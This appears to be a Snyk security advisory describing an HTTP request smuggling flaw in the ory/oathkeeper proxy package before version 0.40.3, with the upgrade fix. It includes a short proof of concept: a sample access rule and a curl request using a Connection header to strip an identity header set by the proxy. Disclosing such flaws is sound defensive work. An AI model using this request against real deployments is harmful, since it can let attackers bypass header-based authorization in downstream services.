HTTP Request Smuggling Affecting github.com/ory/oathkeeper/proxy package, versions <0.40.3
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk IDSNYK-GOLANG-GITHUBCOMORYOATHKEEPERPROXY-5488419
- published28 Apr 2023
- disclosed26 Apr 2023
- creditviters
Introduced: 26 Apr 2023
CVE NOT AVAILABLE CWE-444 (opens in a new tab)How to fix?
Upgrade github.com/ory/oathkeeper/proxy to version 0.40.3 or higher.
Overview
github.com/ory/oathkeeper/proxy is an Identity & Access Proxy (IAP) and Access Control Decision API that authorizes HTTP requests based on sets of Access Rules
Affected versions of this package are vulnerable to HTTP Request Smuggling such that downstream services relying on the presence of headers set by the header mutator can be exploited. A client can drop the header set by the header mutator by including that header's name in the Connection header.
PoC
- id: 'example'
upstream:
url: 'https://example.com'
match:
url: 'http://127.0.0.1:4455/'
methods:
- GET
authenticators:
- handler: anonymous
authorizer:
handler: allow
mutators:
- handler: header
config:
headers:
X-Subject: {{ .Subject }}
curl -H "Connection: x-subject" http://127.0.0.1:4455/
The X-Subject header will not arrive at the downstream server. It is completely dropped. In case the downstream server handles such a request in an unexpected way, an attacker can exploit this, assuming they know or guess the internal header name.